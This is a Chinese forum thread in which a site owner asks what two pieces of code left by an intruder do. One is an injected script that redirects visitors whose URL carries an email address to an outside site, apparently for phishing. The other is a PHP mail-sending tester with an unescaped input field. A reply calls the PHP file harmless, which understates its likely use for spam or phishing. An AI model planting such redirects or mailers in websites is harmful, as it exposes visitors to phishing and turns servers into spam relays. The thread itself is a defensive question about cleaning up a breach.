网站被黑，请教下大佬恶意代码的作用

• 请不要在回答技术问题时复制粘贴 AI 生成的内容

This topic created in 2317 days ago, the information mentioned may be changed or developed.

一个网站被黑（ https://virmach.net/ ），目前已经恢复，问下各位大佬，黑客留下的一个代码如下：

<script type="text/javascript" >
function validateEmail(email) {
var re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(email);
}
var hash = window.location.hash.substring(1);
if(validateEmail(hash)) {
window.location = "https://rpsalaw.com/Fex/?email="+hash;
}
</script>

请问这个代码是用来干什么的？

4 replies • 2020-02-05 16:16:52 +08:00

maichael

Feb 5, 2020

判断到 url 的 hash 参数里面如果是一个邮箱地址的话就跳转到 rpsalaw 这个网站。

cquyf

Feb 5, 2020

@maichael 还有一个恶意文件 Test.php ，代码如下：

<?php
error_reporting(0);
echo '<head>
<title> Email sending tester</title>
</head>
<body><b><color> Email sending tester</color></b><br>Write your email and click on send email test<br>
<form method="post">
<input type="email" name="email" style="background-color:whitesmoke;border:1px solid #FFF;outline:none;" required="" placeholder="[email protected]" value="' . $_POST['email'] . '">
<input type="submit" name="send" value="Send Email Test" style="border:none;background-color: #65d05e;color:#fff;cursor:pointer;">
</form>
<br>
</body>';
if (isset($_POST['email']))
{
$rnd = rand();
mail($_POST['email'],"Email Sending Test Report ID: " . $rnd ,"WORKING!");
print "<font color=orange><b>Email Sent To: " . $_POST['email'] . ", Report ID: " . $rnd . "</b></font>";
}

maichael

Feb 5, 2020

@cquyf #2 也没干啥，就发邮件而已，估计是拿你网站练手了。

cquyf

Feb 5, 2020

@maichael 那就好，非常感谢大佬。小站也有黑客光顾，哈哈